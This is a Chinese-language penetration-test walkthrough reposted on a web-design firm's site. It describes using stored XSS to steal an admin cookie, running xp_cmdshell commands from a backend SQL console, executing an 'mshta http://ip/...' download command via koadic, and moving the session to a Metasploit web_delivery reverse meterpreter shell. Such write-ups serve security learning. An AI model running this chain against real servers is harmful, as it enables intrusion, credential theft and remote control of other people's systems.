服務(wù)器權(quán)限滲透測試實例分析

本文小編為大家詳細介紹“服務(wù)器權(quán)限滲透測試實例分析”,內(nèi)容詳細,步驟清晰,細節(jié)處理妥當,希望這篇“服務(wù)器權(quán)限滲透測試實例分析”文章能幫助大家解決疑惑,下面跟著小編的思路慢慢深入,一起來學習新知識吧。

成都創(chuàng)新互聯(lián)公司長期為上1000+客戶提供的網(wǎng)站建設(shè)服務(wù),團隊從業(yè)經(jīng)驗10年,關(guān)注不同地域、不同群體,并針對不同對象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺,與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為龍巖企業(yè)提供專業(yè)的網(wǎng)站設(shè)計制作、成都做網(wǎng)站,龍巖網(wǎng)站改版等技術(shù)服務(wù)。擁有十載豐富建站經(jīng)驗和眾多成功案例,為您定制開發(fā)。

XSS

說起XSS,很多測試人員往往只輸入一些簡單的payload讓其彈窗證明即可(之前我也是這么干的)但通過這篇文章,可能以后不會再讓我們僅僅彈個窗證明其XSS漏洞存在;

Google語法

尋找入手點
滲透的思路是首先進行信息搜集,但這次測試的只有g(shù)etshell或者拿到服務(wù)器的權(quán)限才給分數(shù),像一般的XSS,csrf、弱口令是不算的即便是拿到后臺但是沒有g(shù)etshell的話也是不算的。

在這種情況下一般我是尋找上傳點,通過Google語法搜索,site:子域名+intitle:注冊/登錄/系統(tǒng)來尋找可以注冊或者登錄的地方。

服務(wù)器權(quán)限滲透測試實例分析


注冊成功后發(fā)現(xiàn)個人信息處存在XSS漏洞,平常測試都是讓其彈窗證明一下即可,沒有想通過XSS來做一些事情。

因為該處有身份證上傳功能,我首先對上傳點進行繞過,但是試了各種方法后發(fā)現(xiàn)沒有成功,故放棄該上傳點,開始仔細審查這個網(wǎng)站,發(fā)現(xiàn)此處提交個人信息保存后要管理員審核,而又存在存儲型XSS,那為什么不碰碰運氣打一下管理員的cookie呢。

于是在此處插入XSSpayload之后就出去吃飯靜等結(jié)果。

服務(wù)器權(quán)限滲透測試實例分析

沒想到今天臉確實挺白的,吃飯時發(fā)現(xiàn)XSS打到管理員cookie信息的郵箱已經(jīng)彈到了我的手機上,顧不上吃飯立馬回去打開電腦繼續(xù)搞。

XSS盲打后臺

服務(wù)器權(quán)限滲透測試實例分析

訪問之后通過chrome上的EditThisCookie插件替換cookie成功以管理員的身份進入后臺,但發(fā)現(xiàn)進入的頁面是一個類似于靜態(tài)的頁面,只能看到里面的一些信息,其他什么功能都沒有:

服務(wù)器權(quán)限滲透測試實例分析

心想,不應(yīng)該啊,既然管理員要審核我的用戶信息,肯定是要有審核的那個接口,這時就想到了瀏覽器的同源策略

瀏覽器的同源策略


同源的定義:如果兩個頁面的協(xié)議,端口和主機都相同,則兩個頁面具有相同的源。

Cookie:只有同源的網(wǎng)頁才能共享,但是若兩個頁面一級域名相同,只是二級域名不同,那么瀏覽器可以通過設(shè)置document.domain來共享Cookie。


同源策略


果然可行,通過同源策略,我們成功的進入了管理員的后臺。


進入后臺第一件事:找上傳點!同樣無果,只能看看有沒有其他的突破口。終于在內(nèi)容管理處找到了一個可以執(zhí)行sql語句的地方。

服務(wù)器權(quán)限滲透測試實例分析

既然可以執(zhí)行SQL語句,那肯定少不了我們的常用命令xp_cmdshell,通過命令exec master..xp_cmdshell 'powershell whoami'命令成功執(zhí)行,得知該服務(wù)器權(quán)限為system權(quán)限。

服務(wù)器權(quán)限滲透測試實例分析

接下來的任務(wù)就是反彈shell到我們的MSF上了。但發(fā)現(xiàn)powershell反彈shell怎么彈都彈不回來,但走到這一步總不能放棄吧,畢竟我是想進入他們內(nèi)網(wǎng)拉屎的男人。

這時問了公司大佬,大佬說可以用koadic試一試。


koadic的使用


   之前發(fā)現(xiàn)社區(qū)里面并沒有對koadic的介紹,我這里簡單的提兩句吧。
Koadic是發(fā)布于DEFCON上的一個后滲透工具,它和msf相似,但是Koadic主要是通過使用Windows ScriptHost(也稱為JScript / VBScript)進行大部分的操作,其核心兼容性支持Windows2000到Window 10的環(huán)境中使用,Koadic也試圖兼容Python 2和Python 3。


設(shè)置IP和端口,進行本地監(jiān)聽。

服務(wù)器權(quán)限滲透測試實例分析

koadic生成的mshta http://ip/XXXX 通過xp_cmdshell成功執(zhí)行命令反彈到koadic上。

服務(wù)器權(quán)限滲透測試實例分析

監(jiān)聽成功:

服務(wù)器權(quán)限滲透測試實例分析

cmdshell 0 -->進入cmd命令模式

服務(wù)器權(quán)限滲透測試實例分析

這里其實使用koadic也可以進行后續(xù)操作,如提權(quán)、抓密碼等,但確實是不太熟悉koadic的一些功能,所以這里我們還是選擇使用我們最熟悉的MSF這款神器吧。(吹爆MSF??!-。-)

koadic轉(zhuǎn)shell到MSF

既然在koadic可以執(zhí)行CMD命令,接下來我們只需要把shell轉(zhuǎn)到msf上即可;


打開MSF :msfconsole
使用web_delivery模塊
use exploit/multi/script/web_delivery
設(shè)置payload:
set payload windows/x64/meterpreter/reverse_tcp_rc4
set SRVPORT 8081
set lhost XX.XX.XX.XXX

服務(wù)器權(quán)限滲透測試實例分析

因為之前已經(jīng)通過koadic監(jiān)聽到,而koadic和MSF都搭在我的服務(wù)器上,我們可以將其設(shè)置為攻擊者的內(nèi)網(wǎng)IP地址。


查看內(nèi)網(wǎng)ip:

服務(wù)器權(quán)限滲透測試實例分析

set reverselistenerbindaddress 172.xx.xx.182


run
生成一個powershell.exe

服務(wù)器權(quán)限滲透測試實例分析

在koadic執(zhí)行exe之后成功將shell轉(zhuǎn)移到我們的MSF上

服務(wù)器權(quán)限滲透測試實例分析

成功接收到sessions

服務(wù)器權(quán)限滲透測試實例分析

看到熟悉的meterpreter模塊真的是老淚縱橫?。。。?/p>

服務(wù)器權(quán)限滲透測試實例分析

因為該服務(wù)器的權(quán)限直接是system權(quán)限,無需提權(quán),正當我想繼續(xù)內(nèi)網(wǎng)的主機各種橫向各種沖沖沖的的時候發(fā)現(xiàn)了一個重要的問題:沒有域!??!

讀到這里,這篇“服務(wù)器權(quán)限滲透測試實例分析”文章已經(jīng)介紹完畢,想要掌握這篇文章的知識點還需要大家自己動手實踐使用過才能領(lǐng)會,如果想了解更多相關(guān)內(nèi)容的文章,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

文章題目:服務(wù)器權(quán)限滲透測試實例分析
分享網(wǎng)址:http://muchs.cn/article0/jiosoo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站排名網(wǎng)頁設(shè)計公司、網(wǎng)站營銷、網(wǎng)站設(shè)計、網(wǎng)站建設(shè)搜索引擎優(yōu)化

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

商城網(wǎng)站建設(shè)